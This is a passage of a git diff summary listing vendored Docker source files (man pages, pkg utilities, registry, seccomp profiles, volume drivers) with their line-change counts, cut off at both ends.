.../docker/docker/man/Dockerfile.ppc64le | 35 + .../docker/docker/man/Dockerfile.s390x | 35 + vendor/github.com/docker/docker/man/README.md | 15 + .../docker/docker/man/docker-attach.1.md | 99 + .../docker/docker/man/docker-build.1.md | 340 + .../docker/docker/man/docker-commit.1.md | 71 + .../docker/docker/man/docker-config-json.5.md | 72 + .../docker/docker/man/docker-cp.1.md | 175 + .../docker/docker/man/docker-create.1.md | 553 ++ .../docker/docker/man/docker-diff.1.md | 49 + .../docker/docker/man/docker-events.1.md | 180 + .../docker/docker/man/docker-exec.1.md | 71 + .../docker/docker/man/docker-export.1.md | 46 + .../docker/docker/man/docker-history.1.md | 52 + .../docker/docker/man/docker-images.1.md | 153 + .../docker/docker/man/docker-import.1.md | 72 + .../docker/docker/man/docker-info.1.md | 187 + .../docker/docker/man/docker-inspect.1.md | 323 + .../docker/docker/man/docker-kill.1.md | 28 + .../docker/docker/man/docker-load.1.md | 56 + .../docker/docker/man/docker-login.1.md | 53 + .../docker/docker/man/docker-logout.1.md | 32 + .../docker/docker/man/docker-logs.1.md | 71 + .../docker/man/docker-network-connect.1.md | 66 + .../docker/man/docker-network-create.1.md | 187 + .../docker/man/docker-network-disconnect.1.md | 36 + .../docker/man/docker-network-inspect.1.md | 112 + .../docker/docker/man/docker-network-ls.1.md | 188 + .../docker/docker/man/docker-network-rm.1.md | 43 + .../docker/docker/man/docker-pause.1.md | 32 + .../docker/docker/man/docker-port.1.md | 47 + .../docker/docker/man/docker-ps.1.md | 145 + .../docker/docker/man/docker-pull.1.md | 220 + .../docker/docker/man/docker-push.1.md | 63 + .../docker/docker/man/docker-rename.1.md | 15 + .../docker/docker/man/docker-restart.1.md | 26 + .../docker/docker/man/docker-rm.1.md | 72 + .../docker/docker/man/docker-rmi.1.md | 42 + .../docker/docker/man/docker-run.1.md | 1055 +++ .../docker/docker/man/docker-save.1.md | 45 + .../docker/docker/man/docker-search.1.md | 70 + .../docker/docker/man/docker-start.1.md | 39 + .../docker/docker/man/docker-stats.1.md | 57 + .../docker/docker/man/docker-stop.1.md | 30 + .../docker/docker/man/docker-tag.1.md | 76 + .../docker/docker/man/docker-top.1.md | 36 + .../docker/docker/man/docker-unpause.1.md | 28 + .../docker/docker/man/docker-update.1.md | 171 + .../docker/docker/man/docker-version.1.md | 62 + .../docker/docker/man/docker-wait.1.md | 30 + .../github.com/docker/docker/man/docker.1.md | 237 + .../github.com/docker/docker/man/dockerd.8.md | 710 ++ .../github.com/docker/docker/man/generate.go | 43 + .../github.com/docker/docker/man/generate.sh | 15 + .../github.com/docker/docker/man/glide.lock | 52 + .../github.com/docker/docker/man/glide.yaml | 12 + .../docker/docker/man/md2man-all.sh | 22 + .../docker/docker/migrate/v1/migratev1.go | 504 ++ .../docker/migrate/v1/migratev1_test.go | 438 + .../docker/docker/oci/defaults_linux.go | 168 + .../docker/docker/oci/defaults_solaris.go | 20 + .../docker/docker/oci/defaults_windows.go | 19 + .../docker/docker/oci/devices_linux.go | 86 + .../docker/docker/oci/devices_unsupported.go | 20 + .../docker/docker/oci/namespaces.go | 16 + vendor/github.com/docker/docker/opts/hosts.go | 151 + .../docker/docker/opts/hosts_test.go | 148 + .../docker/docker/opts/hosts_unix.go | 8 + .../docker/docker/opts/hosts_windows.go | 6 + vendor/github.com/docker/docker/opts/ip.go | 47 + .../github.com/docker/docker/opts/ip_test.go | 54 + vendor/github.com/docker/docker/opts/mount.go | 171 + .../docker/docker/opts/mount_test.go | 184 + vendor/github.com/docker/docker/opts/opts.go | 360 + .../docker/docker/opts/opts_test.go | 232 + .../docker/docker/opts/opts_unix.go | 6 + .../docker/docker/opts/opts_windows.go | 56 + vendor/github.com/docker/docker/opts/port.go | 146 + .../docker/docker/opts/port_test.go | 259 + .../docker/docker/opts/quotedstring.go | 37 + .../docker/docker/opts/quotedstring_test.go | 28 + .../github.com/docker/docker/opts/secret.go | 107 + .../docker/docker/opts/secret_test.go | 79 + vendor/github.com/docker/docker/pkg/README.md | 11 + .../docker/docker/pkg/aaparser/aaparser.go | 91 + .../docker/pkg/aaparser/aaparser_test.go | 73 + .../docker/docker/pkg/archive/README.md | 1 + .../docker/docker/pkg/archive/archive.go | 1175 +++ .../docker/pkg/archive/archive_linux.go | 95 + .../docker/pkg/archive/archive_linux_test.go | 187 + .../docker/pkg/archive/archive_other.go | 7 + .../docker/docker/pkg/archive/archive_test.go | 1162 +++ .../docker/docker/pkg/archive/archive_unix.go | 118 + .../docker/pkg/archive/archive_unix_test.go | 249 + .../docker/pkg/archive/archive_windows.go | 70 + .../pkg/archive/archive_windows_test.go | 91 + .../docker/docker/pkg/archive/changes.go | 446 + .../docker/pkg/archive/changes_linux.go | 312 + .../docker/pkg/archive/changes_other.go | 97 + .../docker/pkg/archive/changes_posix_test.go | 132 + .../docker/docker/pkg/archive/changes_test.go | 572 ++ .../docker/docker/pkg/archive/changes_unix.go | 36 + .../docker/pkg/archive/changes_windows.go | 30 + .../docker/docker/pkg/archive/copy.go | 458 + .../docker/docker/pkg/archive/copy_unix.go | 11 + .../docker/pkg/archive/copy_unix_test.go | 978 +++ .../docker/docker/pkg/archive/copy_windows.go | 9 + .../docker/docker/pkg/archive/diff.go | 279 + .../docker/docker/pkg/archive/diff_test.go | 386 + .../docker/pkg/archive/example_changes.go | 97 + .../docker/pkg/archive/testdata/broken.tar | Bin 0 -> 13824 bytes .../docker/docker/pkg/archive/time_linux.go | 16 + .../docker/pkg/archive/time_unsupported.go | 16 + .../docker/docker/pkg/archive/utils_test.go | 166 + .../docker/docker/pkg/archive/whiteouts.go | 23 + .../docker/docker/pkg/archive/wrap.go | 59 + .../docker/docker/pkg/archive/wrap_test.go | 98 + .../docker/docker/pkg/authorization/api.go | 88 + .../docker/docker/pkg/authorization/authz.go | 186 + .../pkg/authorization/authz_unix_test.go | 282 + .../docker/pkg/authorization/middleware.go | 84 + .../docker/docker/pkg/authorization/plugin.go | 112 + .../docker/pkg/authorization/response.go | 203 + .../docker/pkg/broadcaster/unbuffered.go | 49 + .../docker/pkg/broadcaster/unbuffered_test.go | 162 + .../docker/pkg/chrootarchive/archive.go | 97 + .../docker/pkg/chrootarchive/archive_test.go | 394 + .../docker/pkg/chrootarchive/archive_unix.go | 86 + .../pkg/chrootarchive/archive_windows.go | 22 + .../docker/pkg/chrootarchive/chroot_linux.go | 108 + .../docker/pkg/chrootarchive/chroot_unix.go | 12 + .../docker/docker/pkg/chrootarchive/diff.go | 23 + .../docker/pkg/chrootarchive/diff_unix.go | 130 + .../docker/pkg/chrootarchive/diff_windows.go | 45 + .../docker/pkg/chrootarchive/init_unix.go | 28 + .../docker/pkg/chrootarchive/init_windows.go | 4 + .../docker/pkg/devicemapper/devmapper.go | 828 ++ .../docker/pkg/devicemapper/devmapper_log.go | 35 + .../pkg/devicemapper/devmapper_wrapper.go | 251 + .../devmapper_wrapper_deferred_remove.go | 34 + .../devmapper_wrapper_no_deferred_remove.go | 15 + .../docker/docker/pkg/devicemapper/ioctl.go | 27 + .../docker/docker/pkg/devicemapper/log.go | 11 + .../docker/docker/pkg/directory/directory.go | 26 + .../docker/pkg/directory/directory_test.go | 192 + .../docker/pkg/directory/directory_unix.go | 48 + .../docker/pkg/directory/directory_windows.go | 37 + .../docker/docker/pkg/discovery/README.md | 41 + .../docker/docker/pkg/discovery/backends.go | 107 + .../docker/docker/pkg/discovery/discovery.go | 35 + .../docker/pkg/discovery/discovery_test.go | 137 + .../docker/docker/pkg/discovery/entry.go | 94 + .../docker/docker/pkg/discovery/file/file.go | 107 + .../docker/pkg/discovery/file/file_test.go | 114 + .../docker/docker/pkg/discovery/generator.go | 35 + .../docker/pkg/discovery/generator_test.go | 53 + .../docker/docker/pkg/discovery/kv/kv.go | 192 + .../docker/docker/pkg/discovery/kv/kv_test.go | 324 + .../docker/pkg/discovery/memory/memory.go | 93 + .../pkg/discovery/memory/memory_test.go | 48 + .../docker/pkg/discovery/nodes/nodes.go | 54 + .../docker/pkg/discovery/nodes/nodes_test.go | 51 + .../docker/pkg/filenotify/filenotify.go | 40 + .../docker/docker/pkg/filenotify/fsnotify.go | 18 + .../docker/docker/pkg/filenotify/poller.go | 204 + .../docker/pkg/filenotify/poller_test.go | 119 + .../docker/docker/pkg/fileutils/fileutils.go | 283 + .../docker/pkg/fileutils/fileutils_darwin.go | 27 + .../docker/pkg/fileutils/fileutils_solaris.go | 7 + .../docker/pkg/fileutils/fileutils_test.go | 585 ++ .../docker/pkg/fileutils/fileutils_unix.go | 22 + .../docker/pkg/fileutils/fileutils_windows.go | 7 + .../docker/pkg/fsutils/fsutils_linux.go | 89 + .../docker/pkg/fsutils/fsutils_linux_test.go | 91 + .../docker/docker/pkg/gitutils/gitutils.go | 100 + .../docker/pkg/gitutils/gitutils_test.go | 220 + .../docker/pkg/graphdb/conn_sqlite3_linux.go | 19 + .../docker/pkg/graphdb/graphdb_linux.go | 551 ++ .../docker/pkg/graphdb/graphdb_linux_test.go | 721 ++ .../docker/docker/pkg/graphdb/sort_linux.go | 27 + .../docker/pkg/graphdb/sort_linux_test.go | 29 + .../docker/docker/pkg/graphdb/unsupported.go | 3 + .../docker/docker/pkg/graphdb/utils_linux.go | 32 + .../docker/docker/pkg/homedir/homedir.go | 39 + .../docker/docker/pkg/homedir/homedir_test.go | 24 + .../docker/docker/pkg/httputils/httputils.go | 56 + .../docker/pkg/httputils/httputils_test.go | 115 + .../docker/docker/pkg/httputils/mimetype.go | 30 + .../docker/pkg/httputils/mimetype_test.go | 13 + .../pkg/httputils/resumablerequestreader.go | 95 + .../httputils/resumablerequestreader_test.go | 307 + .../docker/docker/pkg/idtools/idtools.go | 197 + .../docker/docker/pkg/idtools/idtools_unix.go | 207 + .../docker/pkg/idtools/idtools_unix_test.go | 271 + .../docker/pkg/idtools/idtools_windows.go | 25 + .../docker/pkg/idtools/usergroupadd_linux.go | 164 + .../pkg/idtools/usergroupadd_unsupported.go | 12 + .../docker/docker/pkg/idtools/utils_unix.go | 32 + .../docker/pkg/integration/checker/checker.go | 46 + .../docker/pkg/integration/cmd/command.go | 294 + .../pkg/integration/cmd/command_test.go | 118 + .../docker/docker/pkg/integration/utils.go | 227 + .../docker/pkg/integration/utils_test.go | 363 + .../docker/docker/pkg/ioutils/buffer.go | 51 + .../docker/docker/pkg/ioutils/buffer_test.go | 75 + .../docker/docker/pkg/ioutils/bytespipe.go | 186 + .../docker/pkg/ioutils/bytespipe_test.go | 159 + .../docker/docker/pkg/ioutils/fmt.go | 22 + .../docker/docker/pkg/ioutils/fmt_test.go | 17 + .../docker/docker/pkg/ioutils/fswriters.go | 162 + .../docker/pkg/ioutils/fswriters_test.go | 132 + .../docker/docker/pkg/ioutils/multireader.go | 223 + .../docker/pkg/ioutils/multireader_test.go | 211 + .../docker/docker/pkg/ioutils/readers.go | 154 + .../docker/docker/pkg/ioutils/readers_test.go | 94 + .../docker/docker/pkg/ioutils/temp_unix.go | 10 + .../docker/docker/pkg/ioutils/temp_windows.go | 18 + .../docker/docker/pkg/ioutils/writeflusher.go | 92 + .../docker/docker/pkg/ioutils/writers.go | 66 + .../docker/docker/pkg/ioutils/writers_test.go | 65 + .../docker/docker/pkg/jsonlog/jsonlog.go | 42 + .../docker/pkg/jsonlog/jsonlog_marshalling.go | 178 + .../pkg/jsonlog/jsonlog_marshalling_test.go | 34 + .../docker/docker/pkg/jsonlog/jsonlogbytes.go | 122 + .../docker/pkg/jsonlog/jsonlogbytes_test.go | 39 + .../docker/pkg/jsonlog/time_marshalling.go | 27 + .../pkg/jsonlog/time_marshalling_test.go | 47 + .../docker/pkg/jsonmessage/jsonmessage.go | 225 + .../pkg/jsonmessage/jsonmessage_test.go | 245 + .../docker/pkg/listeners/listeners_solaris.go | 31 + .../docker/pkg/listeners/listeners_unix.go | 94 + .../docker/pkg/listeners/listeners_windows.go | 54 + .../docker/docker/pkg/locker/README.md | 65 + .../docker/docker/pkg/locker/locker.go | 112 + .../docker/docker/pkg/locker/locker_test.go | 124 + .../docker/docker/pkg/longpath/longpath.go | 26 + .../docker/pkg/longpath/longpath_test.go | 22 + .../docker/pkg/loopback/attach_loopback.go | 137 + .../docker/docker/pkg/loopback/ioctl.go | 53 + .../docker/pkg/loopback/loop_wrapper.go | 52 + .../docker/docker/pkg/loopback/loopback.go | 63 + .../docker/docker/pkg/mount/flags.go | 149 + .../docker/docker/pkg/mount/flags_freebsd.go | 48 + .../docker/docker/pkg/mount/flags_linux.go | 85 + .../docker/pkg/mount/flags_unsupported.go | 30 + .../docker/docker/pkg/mount/mount.go | 74 + .../docker/pkg/mount/mount_unix_test.go | 162 + .../docker/pkg/mount/mounter_freebsd.go | 59 + .../docker/docker/pkg/mount/mounter_linux.go | 21 + .../docker/pkg/mount/mounter_solaris.go | 33 + .../docker/pkg/mount/mounter_unsupported.go | 11 + .../docker/docker/pkg/mount/mountinfo.go | 40 + .../docker/pkg/mount/mountinfo_freebsd.go | 41 + .../docker/pkg/mount/mountinfo_linux.go | 95 + .../docker/pkg/mount/mountinfo_linux_test.go | 476 + .../docker/pkg/mount/mountinfo_solaris.go | 37 + .../docker/pkg/mount/mountinfo_unsupported.go | 12 + .../docker/pkg/mount/mountinfo_windows.go | 6 + .../docker/pkg/mount/sharedsubtree_linux.go | 69 + .../pkg/mount/sharedsubtree_linux_test.go | 331 + .../docker/pkg/mount/sharedsubtree_solaris.go | 58 + .../cmd/names-generator/main.go | 11 + .../pkg/namesgenerator/names-generator.go | 590 ++ .../namesgenerator/names-generator_test.go | 27 + .../docker/pkg/parsers/kernel/kernel.go | 74 + .../pkg/parsers/kernel/kernel_darwin.go | 56 + .../docker/pkg/parsers/kernel/kernel_unix.go | 45 + .../pkg/parsers/kernel/kernel_unix_test.go | 96 + .../pkg/parsers/kernel/kernel_windows.go | 69 + .../docker/pkg/parsers/kernel/uname_linux.go | 19 + .../pkg/parsers/kernel/uname_solaris.go | 14 + .../pkg/parsers/kernel/uname_unsupported.go | 18 + .../operatingsystem/operatingsystem_linux.go | 77 + .../operatingsystem_solaris.go | 37 + .../operatingsystem/operatingsystem_unix.go | 25 + .../operatingsystem_unix_test.go | 247 + .../operatingsystem_windows.go | 49 + .../docker/docker/pkg/parsers/parsers.go | 69 + .../docker/docker/pkg/parsers/parsers_test.go | 70 + .../docker/docker/pkg/pidfile/pidfile.go | 56 + .../docker/pkg/pidfile/pidfile_darwin.go | 18 + .../docker/docker/pkg/pidfile/pidfile_test.go | 38 + .../docker/docker/pkg/pidfile/pidfile_unix.go | 16 + .../docker/pkg/pidfile/pidfile_windows.go | 23 + .../docker/pkg/platform/architecture_linux.go | 16 + .../docker/pkg/platform/architecture_unix.go | 20 + .../pkg/platform/architecture_windows.go | 60 + .../docker/docker/pkg/platform/platform.go | 23 + .../docker/pkg/platform/utsname_int8.go | 18 + .../docker/pkg/platform/utsname_uint8.go | 18 + .../docker/docker/pkg/plugingetter/getter.go | 35 + .../docker/docker/pkg/plugins/client.go | 205 + .../docker/docker/pkg/plugins/client_test.go | 134 + .../docker/docker/pkg/plugins/discovery.go | 131 + .../docker/pkg/plugins/discovery_test.go | 152 + .../docker/pkg/plugins/discovery_unix.go | 5 + .../docker/pkg/plugins/discovery_unix_test.go | 61 + .../docker/pkg/plugins/discovery_windows.go | 8 + .../docker/docker/pkg/plugins/errors.go | 33 + .../docker/docker/pkg/plugins/plugin_test.go | 44 + .../pkg/plugins/pluginrpc-gen/README.md | 58 + .../pkg/plugins/pluginrpc-gen/fixtures/foo.go | 89 + .../fixtures/otherfixture/spaceship.go | 4 + .../docker/pkg/plugins/pluginrpc-gen/main.go | 91 + .../pkg/plugins/pluginrpc-gen/parser.go | 263 + .../pkg/plugins/pluginrpc-gen/parser_test.go | 222 + .../pkg/plugins/pluginrpc-gen/template.go | 118 + .../docker/docker/pkg/plugins/plugins.go | 329 + .../docker/pkg/plugins/plugins_linux.go | 7 + .../docker/pkg/plugins/plugins_windows.go | 8 + .../docker/pkg/plugins/transport/http.go | 36 + .../docker/pkg/plugins/transport/transport.go | 36 + .../docker/docker/pkg/pools/pools.go | 116 + .../docker/docker/pkg/pools/pools_test.go | 161 + .../docker/docker/pkg/progress/progress.go | 84 + .../docker/pkg/progress/progressreader.go | 66 + .../pkg/progress/progressreader_test.go | 75 + .../docker/docker/pkg/promise/promise.go | 11 + .../docker/docker/pkg/pubsub/publisher.go | 111 + .../docker/pkg/pubsub/publisher_test.go | 142 + .../docker/docker/pkg/random/random.go | 71 + .../docker/docker/pkg/random/random_test.go | 22 + .../docker/docker/pkg/reexec/README.md | 5 + .../docker/docker/pkg/reexec/command_linux.go | 28 + .../docker/docker/pkg/reexec/command_unix.go | 23 + .../docker/pkg/reexec/command_unsupported.go | 12 + .../docker/pkg/reexec/command_windows.go | 23 + .../docker/docker/pkg/reexec/reexec.go | 47 + .../docker/docker/pkg/registrar/registrar.go | 127 + .../docker/pkg/registrar/registrar_test.go | 119 + .../docker/docker/pkg/signal/README.md | 1 + .../docker/docker/pkg/signal/signal.go | 54 + .../docker/docker/pkg/signal/signal_darwin.go | 41 + .../docker/pkg/signal/signal_freebsd.go | 43 + .../docker/docker/pkg/signal/signal_linux.go | 80 + .../docker/pkg/signal/signal_solaris.go | 42 + .../docker/docker/pkg/signal/signal_unix.go | 21 + .../docker/pkg/signal/signal_unsupported.go | 10 + .../docker/pkg/signal/signal_windows.go | 28 + .../docker/docker/pkg/signal/trap.go | 103 + .../docker/docker/pkg/stdcopy/stdcopy.go | 174 + .../docker/docker/pkg/stdcopy/stdcopy_test.go | 260 + .../pkg/streamformatter/streamformatter.go | 172 + .../streamformatter/streamformatter_test.go | 108 + .../docker/docker/pkg/stringid/README.md | 1 + .../docker/docker/pkg/stringid/stringid.go | 69 + .../docker/pkg/stringid/stringid_test.go | 72 + .../docker/docker/pkg/stringutils/README.md | 1 + .../docker/pkg/stringutils/stringutils.go | 101 + .../pkg/stringutils/stringutils_test.go | 121 + .../docker/docker/pkg/symlink/LICENSE.APACHE | 191 + .../docker/docker/pkg/symlink/LICENSE.BSD | 27 + .../docker/docker/pkg/symlink/README.md | 6 + .../docker/docker/pkg/symlink/fs.go | 144 + .../docker/docker/pkg/symlink/fs_unix.go | 15 + .../docker/docker/pkg/symlink/fs_unix_test.go | 407 + .../docker/docker/pkg/symlink/fs_windows.go | 169 + .../docker/docker/pkg/sysinfo/README.md | 1 + .../docker/docker/pkg/sysinfo/numcpu.go | 12 + .../docker/docker/pkg/sysinfo/numcpu_linux.go | 43 + .../docker/pkg/sysinfo/numcpu_windows.go | 37 + .../docker/docker/pkg/sysinfo/sysinfo.go | 144 + .../docker/pkg/sysinfo/sysinfo_linux.go | 259 + .../docker/pkg/sysinfo/sysinfo_linux_test.go | 58 + .../docker/pkg/sysinfo/sysinfo_solaris.go | 121 + .../docker/docker/pkg/sysinfo/sysinfo_test.go | 26 + .../docker/docker/pkg/sysinfo/sysinfo_unix.go | 9 + .../docker/pkg/sysinfo/sysinfo_windows.go | 9 + .../docker/docker/pkg/system/chtimes.go | 52 + .../docker/docker/pkg/system/chtimes_test.go | 94 + .../docker/docker/pkg/system/chtimes_unix.go | 14 + .../docker/pkg/system/chtimes_unix_test.go | 91 + .../docker/pkg/system/chtimes_windows.go | 27 + .../docker/pkg/system/chtimes_windows_test.go | 86 + .../docker/docker/pkg/system/errors.go | 10 + .../docker/pkg/system/events_windows.go | 85 + .../docker/docker/pkg/system/exitcode.go | 33 + .../docker/docker/pkg/system/filesys.go | 54 + .../docker/pkg/system/filesys_windows.go | 236 + .../docker/docker/pkg/system/lstat.go | 19 + .../docker/pkg/system/lstat_unix_test.go | 30 + .../docker/docker/pkg/system/lstat_windows.go | 25 + .../docker/docker/pkg/system/meminfo.go | 17 + .../docker/docker/pkg/system/meminfo_linux.go | 65 + .../docker/pkg/system/meminfo_solaris.go | 128 + .../docker/pkg/system/meminfo_unix_test.go | 40 + .../docker/pkg/system/meminfo_unsupported.go | 8 + .../docker/pkg/system/meminfo_windows.go | 45 + .../docker/docker/pkg/system/mknod.go | 22 + .../docker/docker/pkg/system/mknod_windows.go | 13 + .../docker/docker/pkg/system/path_unix.go | 14 + .../docker/docker/pkg/system/path_windows.go | 37 + .../docker/pkg/system/path_windows_test.go | 78 + .../docker/docker/pkg/system/stat.go | 53 + .../docker/docker/pkg/system/stat_darwin.go | 32 + .../docker/docker/pkg/system/stat_freebsd.go | 27 + .../docker/docker/pkg/system/stat_linux.go | 33 + .../docker/docker/pkg/system/stat_openbsd.go | 15 + .../docker/docker/pkg/system/stat_solaris.go | 34 + .../docker/pkg/system/stat_unix_test.go | 39 + .../docker/pkg/system/stat_unsupported.go | 17 + .../docker/docker/pkg/system/stat_windows.go | 43 + .../docker/docker/pkg/system/syscall_unix.go | 17 + .../docker/pkg/system/syscall_windows.go | 105 + .../docker/pkg/system/syscall_windows_test.go | 9 + .../docker/docker/pkg/system/umask.go | 13 + .../docker/docker/pkg/system/umask_windows.go | 9 + .../docker/pkg/system/utimes_freebsd.go | 22 + .../docker/docker/pkg/system/utimes_linux.go | 26 + .../docker/pkg/system/utimes_unix_test.go | 68 + .../docker/pkg/system/utimes_unsupported.go | 10 + .../docker/docker/pkg/system/xattrs_linux.go | 63 + .../docker/pkg/system/xattrs_unsupported.go | 13 + .../docker/docker/pkg/tailfile/tailfile.go | 66 + .../docker/pkg/tailfile/tailfile_test.go | 148 + .../docker/pkg/tarsum/builder_context.go | 21 + .../docker/pkg/tarsum/builder_context_test.go | 67 + .../docker/docker/pkg/tarsum/fileinfosums.go | 126 + .../docker/pkg/tarsum/fileinfosums_test.go | 62 + .../docker/docker/pkg/tarsum/tarsum.go | 295 + .../docker/docker/pkg/tarsum/tarsum_spec.md | 230 + .../docker/docker/pkg/tarsum/tarsum_test.go | 664 ++ .../json | 1 + .../layer.tar | Bin 0 -> 9216 bytes .../json | 1 + .../layer.tar | Bin 0 -> 1536 bytes .../tarsum/testdata/collision/collision-0.tar | Bin 0 -> 10240 bytes .../tarsum/testdata/collision/collision-1.tar | Bin 0 -> 10240 bytes .../tarsum/testdata/collision/collision-2.tar | Bin 0 -> 10240 bytes .../tarsum/testdata/collision/collision-3.tar | Bin 0 -> 10240 bytes .../docker/pkg/tarsum/testdata/xattr/json | 1 + .../pkg/tarsum/testdata/xattr/layer.tar | Bin 0 -> 2560 bytes .../docker/docker/pkg/tarsum/versioning.go | 150 + .../docker/pkg/tarsum/versioning_test.go | 98 + .../docker/docker/pkg/tarsum/writercloser.go | 22 + .../docker/docker/pkg/term/ascii.go | 66 + .../docker/docker/pkg/term/ascii_test.go | 43 + .../docker/docker/pkg/term/tc_linux_cgo.go | 50 + .../docker/docker/pkg/term/tc_other.go | 20 + .../docker/docker/pkg/term/tc_solaris_cgo.go | 63 + .../github.com/docker/docker/pkg/term/term.go | 123 + .../docker/docker/pkg/term/term_solaris.go | 41 + .../docker/docker/pkg/term/term_unix.go | 29 + .../docker/docker/pkg/term/term_windows.go | 233 + .../docker/docker/pkg/term/termios_darwin.go | 69 + .../docker/docker/pkg/term/termios_freebsd.go | 69 + .../docker/docker/pkg/term/termios_linux.go | 47 + .../docker/docker/pkg/term/termios_openbsd.go | 69 + .../docker/pkg/term/windows/ansi_reader.go | 263 + .../docker/pkg/term/windows/ansi_writer.go | 64 + .../docker/docker/pkg/term/windows/console.go | 35 + .../docker/docker/pkg/term/windows/windows.go | 33 + .../docker/pkg/term/windows/windows_test.go | 3 + .../docker/pkg/testutil/assert/assert.go | 97 + .../docker/docker/pkg/testutil/pkg.go | 1 + .../docker/pkg/testutil/tempfile/tempfile.go | 36 + .../docker/pkg/tlsconfig/tlsconfig_clone.go | 11 + .../pkg/tlsconfig/tlsconfig_clone_go16.go | 31 + .../pkg/tlsconfig/tlsconfig_clone_go17.go | 33 + .../docker/pkg/truncindex/truncindex.go | 137 + .../docker/pkg/truncindex/truncindex_test.go | 429 + .../docker/docker/pkg/urlutil/urlutil.go | 50 + .../docker/docker/pkg/urlutil/urlutil_test.go | 70 + .../docker/docker/pkg/useragent/README.md | 1 + .../docker/docker/pkg/useragent/useragent.go | 55 + .../docker/pkg/useragent/useragent_test.go | 31 + .../docker/docker/plugin/backend_linux.go | 790 ++ .../docker/plugin/backend_unsupported.go | 71 + .../docker/docker/plugin/blobstore.go | 181 + .../github.com/docker/docker/plugin/defs.go | 26 + .../docker/docker/plugin/manager.go | 347 + .../docker/docker/plugin/manager_linux.go | 284 + .../docker/docker/plugin/manager_solaris.go | 28 + .../docker/docker/plugin/manager_windows.go | 30 + .../github.com/docker/docker/plugin/store.go | 263 + .../docker/docker/plugin/store_test.go | 33 + .../docker/docker/plugin/v2/plugin.go | 244 + .../docker/docker/plugin/v2/plugin_linux.go | 121 + .../docker/plugin/v2/plugin_unsupported.go | 14 + .../docker/docker/plugin/v2/settable.go | 102 + .../docker/docker/plugin/v2/settable_test.go | 91 + vendor/github.com/docker/docker/poule.yml | 88 + .../docker/profiles/apparmor/apparmor.go | 122 + .../docker/profiles/apparmor/template.go | 46 + .../docker/profiles/seccomp/default.json | 698 ++ .../profiles/seccomp/fixtures/example.json | 27 + .../docker/profiles/seccomp/generate.go | 32 + .../docker/docker/profiles/seccomp/seccomp.go | 150 + .../profiles/seccomp/seccomp_default.go | 604 ++ .../docker/profiles/seccomp/seccomp_test.go | 32 + .../profiles/seccomp/seccomp_unsupported.go | 13 + .../github.com/docker/docker/project/ARM.md | 45 + .../docker/project/BRANCHES-AND-TAGS.md | 35 + .../docker/docker/project/CONTRIBUTORS.md | 1 + .../docker/docker/project/GOVERNANCE.md | 17 + .../docker/project/IRC-ADMINISTRATION.md | 37 + .../docker/docker/project/ISSUE-TRIAGE.md | 132 + .../project/PACKAGE-REPO-MAINTENANCE.md | 74 + .../docker/docker/project/PACKAGERS.md | 307 + .../docker/docker/project/PATCH-RELEASES.md | 68 + .../docker/docker/project/PRINCIPLES.md | 19 + .../docker/docker/project/README.md | 24 + .../docker/project/RELEASE-CHECKLIST.md | 518 ++ .../docker/docker/project/RELEASE-PROCESS.md | 78 + .../docker/docker/project/REVIEWING.md | 246 + .../github.com/docker/docker/project/TOOLS.md | 63 + .../docker/docker/reference/reference.go | 216 + .../docker/docker/reference/reference_test.go | 275 + .../docker/docker/reference/store.go | 286 + .../docker/docker/reference/store_test.go | 356 + .../github.com/docker/docker/registry/auth.go | 303 + .../docker/docker/registry/auth_test.go | 124 + .../docker/docker/registry/config.go | 305 + .../docker/docker/registry/config_test.go | 49 + .../docker/docker/registry/config_unix.go | 25 + .../docker/docker/registry/config_windows.go | 25 + .../docker/docker/registry/endpoint_test.go | 78 + .../docker/docker/registry/endpoint_v1.go | 198 + .../docker/docker/registry/registry.go | 191 + .../docker/registry/registry_mock_test.go | 478 + .../docker/docker/registry/registry_test.go | 875 ++ .../docker/docker/registry/service.go | 304 + .../docker/docker/registry/service_v1.go | 40 + .../docker/docker/registry/service_v1_test.go | 23 + .../docker/docker/registry/service_v2.go | 78 + .../docker/docker/registry/session.go | 783 ++ .../docker/docker/registry/types.go | 73 + .../docker/restartmanager/restartmanager.go | 128 + .../restartmanager/restartmanager_test.go | 34 + .../docker/docker/runconfig/compare.go | 61 + .../docker/docker/runconfig/compare_test.go | 126 + .../docker/docker/runconfig/config.go | 97 + .../docker/docker/runconfig/config_test.go | 139 + .../docker/docker/runconfig/config_unix.go | 59 + .../docker/docker/runconfig/config_windows.go | 19 + .../docker/docker/runconfig/errors.go | 46 + .../fixtures/unix/container_config_1_14.json | 30 + .../fixtures/unix/container_config_1_17.json | 50 + .../fixtures/unix/container_config_1_19.json | 58 + .../unix/container_hostconfig_1_14.json | 18 + .../unix/container_hostconfig_1_19.json | 30 + .../windows/container_config_1_19.json | 58 + .../docker/docker/runconfig/hostconfig.go | 35 + .../docker/runconfig/hostconfig_solaris.go | 41 + .../docker/runconfig/hostconfig_test.go | 283 + .../docker/runconfig/hostconfig_unix.go | 129 + .../docker/runconfig/hostconfig_windows.go | 68 + .../docker/docker/runconfig/opts/envfile.go | 81 + .../docker/runconfig/opts/envfile_test.go | 142 + .../docker/runconfig/opts/fixtures/utf16.env | Bin 0 -> 54 bytes .../runconfig/opts/fixtures/utf16be.env | Bin 0 -> 54 bytes .../docker/runconfig/opts/fixtures/utf8.env | 3 + .../docker/runconfig/opts/fixtures/valid.env | 1 + .../runconfig/opts/fixtures/valid.label | 1 + .../docker/docker/runconfig/opts/opts.go | 83 + .../docker/docker/runconfig/opts/opts_test.go | 113 + .../docker/docker/runconfig/opts/parse.go | 995 +++ .../docker/runconfig/opts/parse_test.go | 894 ++ .../docker/docker/runconfig/opts/runtime.go | 79 + .../docker/runconfig/opts/throttledevice.go | 111 + .../docker/docker/runconfig/opts/ulimit.go | 57 + .../docker/runconfig/opts/ulimit_test.go | 42 + .../docker/runconfig/opts/weightdevice.go | 89 + .../github.com/docker/docker/utils/debug.go | 26 + .../docker/docker/utils/debug_test.go | 43 + .../github.com/docker/docker/utils/names.go | 9 + .../docker/docker/utils/process_unix.go | 22 + .../docker/docker/utils/process_windows.go | 20 + .../docker/utils/templates/templates.go | 42 + .../docker/utils/templates/templates_test.go | 38 + .../github.com/docker/docker/utils/utils.go | 87 + .../docker/docker/utils/utils_test.go | 21 + vendor/github.com/docker/docker/vendor.conf | 140 + .../docker/docker/volume/drivers/adapter.go | 177 + .../docker/docker/volume/drivers/extpoint.go | 215 + .../docker/volume/drivers/extpoint_test.go | 23 + .../docker/docker/volume/drivers/proxy.go | 242 + .../docker/volume/drivers/proxy_test.go | 132 + .../docker/docker/volume/local/local.go | 364 + .../docker/docker/volume/local/local_test.go | 344 + .../docker/docker/volume/local/local_unix.go | 87 + 